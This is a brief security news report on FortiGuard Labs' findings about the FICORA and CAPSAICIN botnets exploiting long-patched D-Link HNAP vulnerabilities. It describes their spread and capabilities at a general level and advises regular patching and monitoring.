Security researchers at FortiGuard Labs have detected an uptick in malicious activity from two dangerous botnets targeting vulnerable D-Link devices worldwide.
The two threats - a Mirai variant called "FICORA" and a Kaiten variant known as "CAPSAICIN" - exploit weaknesses in D-Link's HNAP interface to gain remote control of devices. The botnets take advantage of several security flaws, including some dating back to 2015.
"Attackers frequently reuse older attacks, which explains why these botnets continue to spread to new victims," noted FortiGuard Labs researchers in their latest threat report.
The FICORA botnet has shown widespread activity across multiple countries, deploying a shell script that downloads and executes malware targeting Linux systems. This botnet leverages various protocols for DDoS attacks, including UDP, TCP, and DNS. Its configuration details and command-and-control server information are protected using ChaCha20 encryption.
Meanwhile, the CAPSAICIN botnet demonstrated intense but brief activity over just two days in October 2024, primarily affecting East Asian nations. This variant appears connected to the Keksec group's malware family, specifically version 17.0.0. It employs a downloader script to target different Linux architectures and eliminates competing botnet processes to maintain exclusive control.
Both botnets exploit vulnerabilities that have been known and patched for nearly a decade, highlighting the persistent risk posed by unpatched devices. Security experts recommend regular device updates and comprehensive system monitoring to protect against these evolving threats.
The continued spread of these botnets serves as a reminder that aging vulnerabilities remain attractive targets for cybercriminals, even years after patches become available.